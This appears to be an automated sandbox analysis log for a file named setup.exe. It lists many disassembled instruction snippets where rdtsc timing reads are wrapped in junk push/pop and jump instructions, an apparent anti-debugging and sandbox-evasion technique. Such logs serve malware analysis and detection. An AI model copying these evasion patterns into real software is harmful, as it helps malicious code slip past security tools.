Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2B66 second address: 9B2B9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBA24820DA5h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBA24820D9Eh 0x0000001a jnc 00007FBA24820D96h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2B9F second address: 9B2BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2CE2 second address: 9B2CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2CE8 second address: 9B2CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2CED second address: 9B2D14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D9Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jng 00007FBA24820D96h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBA24820DA2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B2D14 second address: 9B2D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBA2516CD55h 0x00000010 jmp 00007FBA2516CD4Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3117 second address: 9B312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA24820D96h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007FBA24820D96h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B325A second address: 9B3260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3260 second address: 9B3264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3264 second address: 9B3279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3279 second address: 9B3287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FBA24820D96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B36E1 second address: 9B36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B36E5 second address: 9B3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Dh 0x00000007 ja 00007FBA24820D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FBA24820D96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3706 second address: 9B370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B370A second address: 9B3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FBA24820DA2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3728 second address: 9B372C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B6B5B second address: 9B6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B6B5F second address: 9B6B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBA2516CD58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD51h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B6B8E second address: 9B6BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA5h 0x00000007 push edi 0x00000008 jg 00007FBA24820D96h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBA24820DA8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 93C64F second address: 93C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD5DD second address: 9BD5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD5E1 second address: 9BD5F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD5F0 second address: 9BD5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBA24820D96h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD149 second address: 9BD16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD58h 0x00000007 jnc 00007FBA2516CD46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD16B second address: 9BD1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 jmp 00007FBA24820DA3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA24820DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD303 second address: 9BD30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9BD30D second address: 9BD311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C078F second address: 9C07AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C07AE second address: 9C07D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBA24820DA7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9391AF second address: 9391B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C00DE second address: 9C010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA8h 0x00000007 jmp 00007FBA24820D9Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C0233 second address: 9C0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C4568 second address: 9C4572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBA24820D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C3C44 second address: 9C3C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA2516CD4Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C41EB second address: 9C41EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C41EF second address: 9C4203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBA2516CD52h 0x0000000c jns 00007FBA2516CD46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C4203 second address: 9C4214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA24820D9Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C4214 second address: 9C4218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C7BBC second address: 9C7BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C7BC0 second address: 9C7BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD53h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C7BD9 second address: 9C7BE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA24820DA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9C7BE3 second address: 9C7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CD838 second address: 9CD852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CD9C4 second address: 9CD9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CDB98 second address: 9CDBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 jg 00007FBA24820DA2h 0x0000000d jns 00007FBA24820D96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CDCEF second address: 9CDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBA2516CD4Fh 0x0000000b popad 0x0000000c pop ebx 0x0000000d ja 00007FBA2516CD66h 0x00000013 jmp 00007FBA2516CD56h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CDE96 second address: 9CDE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CDE9B second address: 9CDEC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD58h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FBA2516CD46h 0x00000010 jno 00007FBA2516CD46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CDEC3 second address: 9CDEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C13F second address: 97C153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C153 second address: 97C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C159 second address: 97C15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C15D second address: 97C199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FBA24820DA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA24820D9Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CE300 second address: 9CE31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA2516CD59h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CE31F second address: 9CE323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CEC48 second address: 9CEC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9CEC4C second address: 9CEC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D75C5 second address: 9D75E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FBA2516CD53h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D75E4 second address: 9D7600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FBA24820DAFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D568E second address: 9D5692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D5BFA second address: 9D5C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA24820DA7h 0x0000000a push eax 0x0000000b jmp 00007FBA24820DA3h 0x00000010 jmp 00007FBA24820D9Ch 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D5C3A second address: 9D5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D5C46 second address: 9D5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D5C4C second address: 9D5C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D62A8 second address: 9D62AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9D7012 second address: 9D7023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DBE78 second address: 9DBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBA24820D9Fh 0x0000000a jmp 00007FBA24820DA5h 0x0000000f pushad 0x00000010 jo 00007FBA24820D96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBA24820DA3h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DBEC4 second address: 9DBED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA2516CD46h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DBED2 second address: 9DBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DF256 second address: 9DF25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DF6B8 second address: 9DF6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DF6BD second address: 9DF6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD55h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FBA2516CD4Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007FBA2516CD46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DF6F2 second address: 9DF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DFA99 second address: 9DFAA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DFAA4 second address: 9DFAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DFAA9 second address: 9DFAAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9DFAAE second address: 9DFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jc 00007FBA24820D96h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FBA24820DB0h 0x00000019 jmp 00007FBA24820D9Ch 0x0000001e je 00007FBA24820D9Eh 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7CA2 second address: 9E7CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA2516CD59h 0x0000000a pop ebx 0x0000000b jbe 00007FBA2516CD69h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FBA2516CD46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7CCF second address: 9E7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7E3D second address: 9E7E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA2516CD46h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f jne 00007FBA2516CD46h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7F96 second address: 9E7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7F9A second address: 9E7F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7F9E second address: 9E7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7FA6 second address: 9E7FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FBA2516CD46h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA2516CD58h 0x00000015 jng 00007FBA2516CD46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7FD4 second address: 9E7FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E8AF9 second address: 9E8AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E8AFF second address: 9E8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E8B04 second address: 9E8B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E8B0E second address: 9E8B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E91B1 second address: 9E91E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBA2516CD59h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD57h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E91E7 second address: 9E91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9E7185 second address: 9E718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9EED4C second address: 9EED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9EED50 second address: 9EED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9FBCF1 second address: 9FBCFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9FBCFB second address: 9FBD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FBA2516CD46h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9FB99B second address: 9FB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9FB9A1 second address: 9FB9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD57h 0x00000009 popad 0x0000000a rdtsc
